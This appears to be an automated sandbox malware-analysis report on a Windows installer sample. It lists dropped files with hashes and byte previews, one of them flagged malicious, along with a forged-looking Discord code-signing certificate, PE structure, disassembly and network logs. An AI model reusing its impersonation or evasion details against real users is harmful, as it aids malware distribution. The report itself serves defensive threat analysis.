                                                                                                                                                                                                                                    SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):283648
                                                                                                                                                                                                                                    Entropy (8bit):6.620270469552191
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:iCV26MqgQTc5F446iYNpK5SB7BJBzLZDKJtIs8di/37EM/j2xQeixApVIa0/vidY:ii2VWTyFsJ8gNJBnGtINsegA/12vkY
                                                                                                                                                                                                                                    MD5:AF0251906A5E8DC2E29B5F49862430B6
                                                                                                                                                                                                                                    SHA1:9BC0AA2CAA3B1524CADEFA2E280121741F702793
                                                                                                                                                                                                                                    SHA-256:4E04DC76B3C8A20EBE47B69B5170F2EFD2CAAC815CDF30777482638CA13A2FF2
                                                                                                                                                                                                                                    SHA-512:F06D8ECBEE3283D210F9B3F5FAB22272223278CBD737BB3B29C2D62C49A40BE80B387BC9197E297CC9223C731C38D79EED903D0C8A26B154F8654D8CB9A02E60
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.......!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):92
                                                                                                                                                                                                                                    Entropy (8bit):2.9465015310985727
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:aQjOytWncAXgWUqt/vlly:/dtWnxX4qU
                                                                                                                                                                                                                                    MD5:9A0F8A5E2120F1281096813074B2AAC4
                                                                                                                                                                                                                                    SHA1:ED1D338A78DCF1AFF1578C60B99CD71EF045DE02
                                                                                                                                                                                                                                    SHA-256:B2C742BF182EDBE73E7316E5FE4FBF18E3973C0960C7E3100DD325548C020D89
                                                                                                                                                                                                                                    SHA-512:BE85E3187FCA25A5BAFC72DC867CAFFE27E559A5CD5E551BEE7A775C81086A23145A465B7168A4FBD3595729EBD686524DA503B0F95B0849510CD15989FBC71D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NickelTruckWritersBattery..MZ......................@........................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:OpenPGP Public Key
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):184320
                                                                                                                                                                                                                                    Entropy (8bit):7.9990224581305895
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:3072:B+OgI76zj2Sv82mD+2eQW9wixbKTdN8RumJKI6F/gt68UPK5ItKBJxBb8rok/F:fgygdmxW9wobOq09itcKOrokN
                                                                                                                                                                                                                                    MD5:BF8A15020DE89C88E0630415C07A1507
                                                                                                                                                                                                                                    SHA1:303B131A8578491E2AEC833522D08A2AA7932B87
                                                                                                                                                                                                                                    SHA-256:D4E22E7559B9D39393B87543AF9BBB3F74B8902346E73471E90623069837200F
                                                                                                                                                                                                                                    SHA-512:62E5D41E80880A4BCFD786B0A93E6014BB706FE4F6E807DAC099F87C29E1140C0823AA3084D8B137EF0FF72840788906C5A72E9445E0615B93BBA835A85B6C29
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.....7k.....N.C{b.\DH..R.:..X....a...'cR1..j...NkD.0_.|*...*Q0o..V..}j....e...s..V..N.fq6.i9..G.........7m..n.8...C....P{5Fuj.....c...".|....O.U.Z.z./!g.N;r.d.x}...}...cD...'a+1..=vY..r...W.f.cVU8.Z..x.....@..~;.>.I..>y..r........_.[b...qo.l..\.J.U...c...i..9G....]..b.k.DK...g...(...UL.3.7'...W.....7...@...V.<.h-..c...y..F;.>.9.......U......*s.x..7.H.74...8....9.wC>.....vG1.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...5.<.'.F...h.............W...e.,cW...e.,ckC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.%..,P..Myn.2..t.W........7I....[.W...OT.cW...e.,cm......2.q8.5...x..2).U.j....>.l#...w....i..`|.....@}.-|......"I...G..eI..a0f.d=...>Q...K.Y.....L.d.../...... D(N....7
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27648
                                                                                                                                                                                                                                    Entropy (8bit):7.992942613032741
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:768:Xgj9/MsYD3XRVCo4zP3wwfpb5jVxDomMWuCM1Pdk3EA:XgjCDPCBwQ5jV5ocM5YEA
                                                                                                                                                                                                                                    MD5:ED69954083A9AE718988271618093ED7
                                                                                                                                                                                                                                    SHA1:73486AC36A6EA34FB1B94C58CB2EBD6376C53045
                                                                                                                                                                                                                                    SHA-256:58B4BD700527D73D9E25C6299ED4B5C9CD9D56615E200070AB8A626037D1DBD6
                                                                                                                                                                                                                                    SHA-512:472A98C92AF3ED71411FF2629D05BCB9277E397FCD715A0184879D25B1C923A385820990A13A63F8CCD53964F52A96E3CF527769C3989B869B4B1769C6A39084
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:M.i.-.B.y!.....i.K..(..tT3;.+Vj.#..Z..z4...m...<.+..K...9.R......./.]...r....[.n...iL.)]..:..:Y.............9.......6...`3.....|T.z.....t[...dz...wE!..\.FQ..A.p..(1.H..&L...~=.\..7..%.e..P...X0.].$v.S.,_....?....\0...k.T&RF..=.5s.v...[.aC..9*Q..VG.TK....`..<y@Y..2..%>..Z........i.1._|QK.2.I....F.}....wE..."...Q.@.0N>b.p......[..<.g..5S....A.L[Wr..R/-kD.g.....M.%..Iz.=..O....4..S.s ...S.....4....<.....9.=.......y8.........$....I..q.k.x.-.<...#m.H..1Eo*."...?J.{M.....k...8..._,....G...l.._.........0...#..>...7...j>-J.G...z"u.`.x...tU.)._/..|...D.^....h..i-G..[.0%..,'.*\Q}<..bX..j8..9t..@%...........@<.e..g.@....].....T\..0..T...g.nr...mx^?.. ..zLt'RJ...........2..Q. 4 ......T.>....}'^a.Y.Ww. q.t..E.GPEL...U ..Y....c.H..D...f..v..z...2g...Nk.%.o"-....|..}...V...Dh...0.7...|........#.uyc..k#..ff..g..I<<........n...m.".W.....';fc.....Tl...R.U..8HL....Y# K..DJh.V(qL....?/3d..T.5N...a...........1.;.t..J:..r%#.....I.P..p.O.4z.x.^.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):34816
                                                                                                                                                                                                                                    Entropy (8bit):7.9944625604863315
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:768:SDJ0vhAvlSCRbzGY5RlIUMmzcoc9wS23ot3V:SDCq4Wb5RCf/95mob
                                                                                                                                                                                                                                    MD5:7CA0F9FD8C73E70074D32C1FCEC93D20
                                                                                                                                                                                                                                    SHA1:D2F43551460F06C8D70669EE3AC07CB095FAC97A
                                                                                                                                                                                                                                    SHA-256:1A7AE62A7FA0B1DABD416C9EC1DBB563E288E5A607F43DAC0F4F36BF3F682EB3
                                                                                                                                                                                                                                    SHA-512:725A94C3FF1063A063A4ACADCC1E2C9F4936AFE8B7A740376F9716A8160F59AF86F0653BC41CCEFFEF18A7A1953A065BD6203F0754235BB9C35102434198C93A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:......\.<.....;.UP3.^.=.U.I..~z..;P...&..L..D.....V.."zm..s..B.-y=@..i.C.d8B?W..z....4W`$.....b.`hFE.J.\.^.Q..A1.Ee.~."f...g......LL.X C,!.*..(......M...S..l..}q\....m...!@~.LY.9Q......^9&...P.J6Lm..x..z....{y(YZ8...{o...3..|.u.1\.nK H..3....q.2.X....Bboz......|W7...u.b.r...D....=2..1....nn8.p.KXR.9....PhNO.i[.....z..e....'.z 0....}w@....S..|..L.'@....O.=.M[].g+*'.[FFe. ........b..T`..aK.....k.a..55...M...P....dk.u7.....`.(<d.....-'<w.E\.A`.....V$..jq..e...F.7>.o...v...y5-..z........h..Fb8.[..b<..:{."B..1.B4..L.%- ..Kk..%7I.n.C!..ZD.L.L.;..R..@.j..IE.......v..7".h........|..<.(~............._.........:....m....Yf.....0....E.....+.....I.*;......'...,.......y.....2.y...lecl...Dwv...X.m.wB.....v......d......P....i.3...z.G..._V.^=u.1.n6..E3.......bp.|....O.Z.'..G...i:...,.N]..p..DB...c.....FA...#.f;dM.h.....9).."..WC..Cy.*..Q.b....00..v..-E.'.......p.-.U.Z.3...5.jG.P.>..../..ti.,.r]...^.l.C.g>..V..EZ..xKxx....Z.N.I|..8G......;.)<.G.%...G.'d.T..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):26624
                                                                                                                                                                                                                                    Entropy (8bit):4.354876183667338
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:z0ocoootoooooooYooooooooooooooooooooooojoooooooooooooooooooooobC:4+AI
                                                                                                                                                                                                                                    MD5:5CB2CC161C5F23A2F8421791D97ACDE4
                                                                                                                                                                                                                                    SHA1:A4AB7C71F7D1C63875858344B6740454348F2D3E
                                                                                                                                                                                                                                    SHA-256:8D2A14615CF91B734D279F06AE19AE1B59F6C1AF53D1AB4F4AD68E1A21A8CA16
                                                                                                                                                                                                                                    SHA-512:E20E3CD7618617C7F3F994588CC10FACAFD8A147BFED46AEAD783FCCC099F740CFE55C0BBC05A17406A78B652CC43DFEAC3E1247460FC62B1C686114034801A8
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.........r.....r.r...r.r.....r.r.........r.........................r...r...............r...................................................................................................................................r.........r.r.................r...............r.........................................................r.........r...........r...r.r.r...............r......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Entropy (8bit):7.976272178685919
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File size:819'026 bytes
                                                                                                                                                                                                                                    MD5:1a6e4128750535604181321ce27c3084
                                                                                                                                                                                                                                    SHA1:7a25a0495ac4d8718dea8baa99b671e6422e39b5
                                                                                                                                                                                                                                    SHA256:c418f6d5142f3f9c830a5750014cc233a12775f5d252ed02a62f45415dd6dd32
                                                                                                                                                                                                                                    SHA512:0a2409b057e95473c48c82b754d27569a41ecbe2f9864d2c2cb88069c07727b170a49963b75c49b66a819f3277384213a90436f4d6f46f7ebb9b5385be007e97
                                                                                                                                                                                                                                    SSDEEP:24576:4NgsvWsdcAc41MqD/m6Qt4lY4UczDCVQ:Y7vTG41Md94Z
                                                                                                                                                                                                                                    TLSH:3F052344FB48849ACB798F3078E54876BBF4968390A486DF1380CA985B36FD1D66F374
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                                                                                                                                                                                                                                    Icon Hash:011b0ecd0999670a
                                                                                                                                                                                                                                    Entrypoint:0x4034f7
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                    Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 11/02/2021 01:00:00 03/05/2024 01:59:59
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=Discord Inc., OU=Select or enter, O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:ADE905125DAD57B1E408EF1C24F835A6
                                                                                                                                                                                                                                    Thumbprint SHA-1:32FB014CC7E60ED19BED95963E21D4EB968D20F4
                                                                                                                                                                                                                                    Thumbprint SHA-256:B37C9978B8AFAF864014F0158EB366DBE2AB2331BFCA6F14A1D20A2EBADB33F8
                                                                                                                                                                                                                                    Serial:02D6AAEAB3924859805EBB529E314DE0
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                    sub esp, 000003F4h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                    pop edi
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                    mov dword ptr [ebp-14h], ebx
                                                                                                                                                                                                                                    mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                                                                                    mov dword ptr [ebp-10h], ebx
                                                                                                                                                                                                                                    call dword ptr [004080CCh]
                                                                                                                                                                                                                                    mov esi, dword ptr [004080D0h]
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                                                                    mov dword ptr [ebp-28h], ebx
                                                                                                                                                                                                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                                                                                    call esi
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    jne 00007F91313C911Ah
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call esi
                                                                                                                                                                                                                                    mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                                                                                    mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                                                                                    sub ax, 00000053h
                                                                                                                                                                                                                                    add ecx, FFFFFFD0h
                                                                                                                                                                                                                                    neg ax
                                                                                                                                                                                                                                    sbb eax, eax
                                                                                                                                                                                                                                    mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                                                                                    not eax
                                                                                                                                                                                                                                    and eax, ecx
                                                                                                                                                                                                                                    mov word ptr [ebp-2Ch], ax
                                                                                                                                                                                                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                                                                                    jnc 00007F91313C90EAh
                                                                                                                                                                                                                                    and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                                                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                                                                                    mov dword ptr [0042A2D8h], eax
                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                                                                                    movzx eax, ax
                                                                                                                                                                                                                                    or eax, ecx
                                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                                    mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                                                                                    movzx ecx, cx
                                                                                                                                                                                                                                    shl eax, 10h
                                                                                                                                                                                                                                    or eax, ecx
                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x1890.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xc32320x4d20
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x65150x660026e66bea3b62728a217ae7bf343ebc1aFalse0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0xa0000x203380x6004b75405561a3fcc45b8fe27a6808f3b5False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .ndata0x2b0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x3b0000x18900x1a00ec5046c4d3017e923cbd8819e3b22101False0.24263822115384615data2.495649939745133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x3b1900x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.15892531876138433
                                                                                                                                                                                                                                    RT_DIALOG0x3c2b80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                    RT_DIALOG0x3c3b80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                    RT_DIALOG0x3c4d80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3c5380x14dataEnglishUnited States1.05
                                                                                                                                                                                                                                    RT_MANIFEST0x3c5500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.060050964 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.060094118 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.060260057 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.093566895 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.093594074 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.307828903 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.308048964 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.400095940 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.400126934 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.400500059 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.400563002 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.403985977 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.448112011 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728144884 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728173018 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728188992 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728303909 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728303909 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728327990 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.728369951 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828700066 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828759909 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828843117 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828876972 CEST4434970923.7.115.52192.168.2.8
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828895092 CEST49709443192.168.2.823.7.115.52
                                                                                                                                                                                                                                    Apr 30, 2024 07:43:53.828917027 CEST49709443192.168.2.823.7.115.52
